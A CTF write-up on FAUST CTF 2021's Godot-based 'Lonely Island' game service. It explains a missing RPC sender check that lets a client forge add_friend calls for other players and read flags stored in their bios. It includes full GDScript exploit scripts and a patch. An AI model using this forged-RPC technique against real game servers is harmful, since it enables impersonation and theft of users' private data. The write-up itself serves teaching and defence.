This task was a multiplayer FPS game built on the Godot engine. This is something you don’t see at CTFs often, let alone at attack-defense ones. One notable example I can think of is Pwn Adventure at Ghost in the Shellcode CTF many years ago. Pwn Adventure was considerably more complex, but it was part of a jeopardy competition, whereas Lonely Island appeared at an attack-defense CTF.

The game itself is simple. It’s a capture-the-flag shooter, akin to old-school arena shooters like Unreal Tournament or Quake (yes, being an Unreal guy myself, in this particular order). It follows the pirate theme of FAUST CTF 2021 itself. There’s only one map and only one weapon, a projectile-based musket of some sort, which kills opponents in one shot. The gameplay itself has some bugs: you can hack your speed, the shadows are cast in the wrong direction relative to the sun, etc. But these bugs have nothing to do with the flags of the A/D competition.



When you register an account, you can enter some bio text about yourself. You can befriend another player, and if they do the same to you, you’ll see each other’s biographies in the friend list. The check system registers accounts and stores the flags in their biographies. So if you can befriend a check system account and make it befriend you back, you’ll be able to steal a flag.

Vulnerability

In Godot, game logic is written in a high-level language called GDScript. Luckily, the scripts are stored in their source code form inside the game .pck archives, which can be easily unpacked and repacked using various tools, like godot-unpacker and GodotPckTool (the latter is more powerful).

For every client connection, the server has a corresponding object, whose source code can be found in server/connection.gd:

    extends Node

    func answer_rpc(method: String, args: Array):
        self.callv("rpc_id", [int(self.name), method] + args)

    master func register(name: String, pw: String, bio: String):
        answer_rpc("register_callback", get_parent().register(name, pw, bio))

    master func login(name: String, pw: String):
        answer_rpc("login_callback", [get_parent().login(int(self.name), name, pw)])

    master func join_game():
        get_parent().join_game(int(self.name))

    master func add_friend(name: String):
        get_parent().add_friend(int(self.name), name)

    master func get_friends():
        answer_rpc("friendlist_callback", [get_parent().get_friends(int(self.name))])

self.name is initialized to the network peer ID in the _on_peer_connected callback in server/server.gd:

    func _on_peer_connected(id: int):
        var connection = Node.new()
        connection.set_script(preload("res://server/connection.gd"))
        connection.name = str(id)
        add_child(connection)

Objects in Godot are organized in a hierarchy. For example, given peer ID 1748223063, the full path of the connection object would be Remote/1748223063.

There is a concept of object ownership in Godot: the authoritative owner for each object is either the server or one of the peers. However, this doesn’t present any security barrier: you’re free to call any RPC method of any object. You can even call a puppet method of an object owned by some other peer: the server will route a method call for you (in this particular case all objects of interest are owned by the server, though). There’s a way to verify the sender, but it has to be done explicitly.

So this gives us an idea: we can try to call add_friend on behalf of another player, making them befriend us. And once we befriend them ourselves, we’ll see their bio in our friend list.
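
The forged call can be sketched roughly as follows. This is only an illustration of the idea, not the final exploit: make_fake_connection and forge_add_friend are hypothetical names, and the sketch assumes the script is attached to a local node named Remote with a network peer already connected, so that the fake node's path matches the server's Remote/<peer ID>.

```gdscript
extends Node

# Hypothetical helper; assumes this script sits on a local node named "Remote",
# mirroring the parent of the connection nodes on the server.
func make_fake_connection(victim_peer_id: int) -> Node:
    var node_name := str(victim_peer_id)
    # Reuse an existing node: a second child with the same name would be renamed.
    if has_node(node_name):
        return get_node(node_name)
    var fake := Node.new()
    fake.name = node_name
    add_child(fake)
    return fake

# Hypothetical helper; needs an active network peer, otherwise rpc_id() fails.
func forge_add_friend(victim_peer_id: int, our_username: String) -> void:
    # RPCs are addressed by node path, so on the server this call lands on the
    # victim's connection node. Peer ID 1 is always the server.
    make_fake_connection(victim_peer_id).rpc_id(1, "add_friend", our_username)
```

The exploit further down attaches the client's connection.gd to the fake node; whether a bare Node is enough for the outgoing call is an assumption of this sketch.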

However, in order to do that, the player has to be connected when we issue the forged add_friend call (there wouldn’t be a connection node otherwise), and we must know their peer ID (because that’s the name of the connection node). Maybe there’s a way to simply ask the server for the IDs of all connected peers, but I never bothered to check, because there was another obvious way: when a player enters the game, a new player node (an in-game object) is created with its name equal to the peer ID:

    # server/game.gd
    func join(id: int, playerinfo) -> bool:
        if id in players:
            return false
        players[id] = true
        # Put the new player on the smallest team.
        var min_team = teams[0]
        var teamid = 0
        for i in range(1, len(teams)):
            if len(teams[i]) < len(min_team):
                min_team = teams[i]
                teamid = i
        min_team[id] = true
        create_player(id, playerinfo.name, teamid)
        # Announce the new player (peer ID and name) to everyone already in the game.
        for target_id in players:
            if target_id != id:
                self.rpc_id(target_id, "create_player", id, playerinfo.name, teamid)
        return true

    # client/game.gd
    puppet func create_player(id: int, name: String, teamid: int):
        if not visible or has_node(str(id)):
            return
        var player = preload("res://client/player.tscn").instance()
        player.name = str(id)
        player.player_name = name
        player.teamid = teamid
        add_child_below_node($Flag1, player)

The check system’s player does join the game for a brief moment. So if our exploit simply joins the game and waits for a player to appear, it can forge these RPC calls right away, inside the create_player RPC handler.
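
As for the alternative mentioned earlier, Godot 3's SceneTree does report connected peer IDs to clients through get_network_connected_peers() and the network_peer_connected signal. The sketch below was not tried against this service; it assumes the server keeps ENet's server relay enabled (the default) and that the network peer is assigned before this node enters the tree. client_ids and _on_peer_seen are hypothetical names.

```gdscript
extends Node

# Hypothetical helper: drop the server (peer ID 1) from a list of peer IDs.
static func client_ids(peer_ids) -> Array:
    var out := []
    for id in peer_ids:
        if id != 1:
            out.append(id)
    return out

func _ready() -> void:
    # Assumption: get_tree().network_peer has already been set by the caller.
    get_tree().connect("network_peer_connected", self, "_on_peer_seen")
    for id in client_ids(get_tree().get_network_connected_peers()):
        _on_peer_seen(id)

func _on_peer_seen(id: int) -> void:
    if id != 1:
        print("peer connected: ", id)
```

Even if this works, peer IDs alone are not enough: befriending the victim in the other direction requires their username, which create_player conveniently delivers together with the ID.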

Exploit

The idea doesn’t sound too complicated, but how do we automate it? Do we need to actually run a modified game client with graphics? Luckily, Godot has a CLI mode that executes a script directly. We can write a bare-bones script that connects and then calls the required RPC methods to register, log in and join the game. We don’t have to implement all the methods and all object types. The engine will spew errors about missing nodes when something happens in the game (player characters move, etc.), but these errors can be safely ignored.

Note that there are several source files: we have to mirror the object hierarchy so that the objects have the proper fully-qualified names. E.g. there should be a Remote at the top, Remote/1748223063 would be one of our fake connection objects for other players, and Remote/Game is the object that receives create_player calls.
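
To make the naming requirement concrete, here is a minimal standalone sketch that builds the same hierarchy out of bare nodes and prints the resulting paths. add_named is a hypothetical helper, and 1748223063 is just the example peer ID used above.

```gdscript
extends SceneTree

# Hypothetical helper: create a bare node with the given name under a parent.
func add_named(parent: Node, node_name: String) -> Node:
    var node := Node.new()
    node.name = node_name
    parent.add_child(node)
    return node

func _init():
    var remote := add_named(get_root(), "Remote")
    var game := add_named(remote, "Game")
    var fake := add_named(remote, "1748223063")
    # Both paths should end in the names the server uses for its own nodes.
    print(game.get_path())
    print(fake.get_path())
    quit()
```

Run through Godot's script mode (the -s command line option), this should print two absolute paths ending in Remote/Game and Remote/1748223063.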

You can download the exploit archive here.

main.gd

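    extends SceneTree

    func _init():
        var node := Node.new()
        node.set_script(load("./control.gd"))
        get_root().add_child(node)
        node.stuff()
        # A bare yield() suspends _init here, so the main loop keeps running;
        # quit() below is only reached if the suspended state is ever resumed.
        yield()
        quit()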

control.gd

    extends Node

    signal connection_changed

    var connection: Node

    func stuff():
        # Mirror the server-side hierarchy: this node must be named "Remote".
        name = "Remote"
        var game := Node.new()
        game.set_script(load("./game.gd"))
        game.name = "Game"
        add_child(game)

        var peer := NetworkedMultiplayerENet.new()
        peer.connect("connection_failed", self, "emit_signal", ["connection_changed", false])
        peer.connect("connection_succeeded", self, "emit_signal", ["connection_changed", true])
        peer.connect("server_disconnected", self, "server_disconnected")
        if peer.create_client(OS.get_environment("target"), 4321) != OK:
            print("create_client failed")
            get_tree().quit(1)
            return
        get_tree().network_peer = peer

        if yield(self, "connection_changed"):
            # Our own connection node, named after our peer ID like on the server.
            connection = Node.new()
            connection.set_script(load("connection.gd"))
            connection.name = str(get_tree().get_network_unique_id())
            print("our connection name is ", connection.name)
            add_child(connection)
        else:
            # Without a connection node the calls below cannot work, so bail out.
            print("fail")
            get_tree().quit(1)
            return

        var username = OS.get_environment("username")
        var password = OS.get_environment("password")
        connection.rpc_id(1, "register", username, password, "")
        yield(connection, "registered")
        connection.rpc_id(1, "login", username, password)
        if yield(connection, "login"):
            print("logged in")
        else:
            print("Cannot log in")

        # Joining the game makes the server send us create_player calls.
        connection.rpc_id(1, "join_game")
        connection.rpc_id(1, "get_friends")
        var friends = yield(connection, "friendlist")
        print(friends)

    func server_disconnected():
        get_tree().quit(1)

game.gd

    extends Node

    puppet func playerlist(list: Array):
        print("playerlist ", list)

    puppet func create_player(id: int, name: String, teamid: int):
        print("create_player ", id, name, teamid)
        # Fake connection node named after the victim's peer ID.
        var connection := Node.new()
        connection.set_script(load("./decoded_pck/client_godot_decoded/client/connection.gd"))
        connection.name = str(id)
        get_parent().add_child(connection)
        # Forged call: the victim befriends us.
        connection.rpc_id(1, "add_friend", OS.get_environment("username"))
        # Legitimate call: we befriend the victim, then fetch the friend list with bios.
        get_parent().connection.rpc_id(1, "add_friend", name)
        get_parent().connection.rpc_id(1, "get_friends")
        var friends = yield(get_parent().connection, "friendlist")
        print(friends)

    puppet func delete_player(id: int):
        print("delete_player ", id)

Patching

How can we patch this vulnerability? As I said earlier, there is a way to verify the sender: get_tree().get_rpc_sender_id() returns the ID of the peer that issued the RPC call currently being handled. Since self.name is initialized to the peer ID, we can simply compare them:

    master func add_friend(name: String):
        var id = int(self.name)
        if id != get_tree().get_rpc_sender_id():
            print("EXPLOITATION DETECTED", " ", id, "!=", get_tree().get_rpc_sender_id())
            return
        get_parent().add_friend(id, name)
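
The other master methods of connection.gd take the caller's identity from self.name in the same way, so the same comparison could be factored into a helper and applied to them too. A minimal sketch, assuming the rest of the service stays unchanged; is_forged is a hypothetical name, not something from the original code:

```gdscript
extends Node

# Hypothetical helper: true when the RPC sender is not the peer
# whose ID this connection node is named after.
static func is_forged(node_name: String, sender_id: int) -> bool:
    return int(node_name) != sender_id

master func join_game():
    if is_forged(self.name, get_tree().get_rpc_sender_id()):
        return
    get_parent().join_game(int(self.name))

master func get_friends():
    if is_forged(self.name, get_tree().get_rpc_sender_id()):
        return
    # Same reply as the original handler, written without the answer_rpc wrapper.
    rpc_id(int(self.name), "friendlist_callback", get_parent().get_friends(int(self.name)))
```

Keeping the comparison in a static function makes it checkable without a network connection.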

/etc/passwd for ants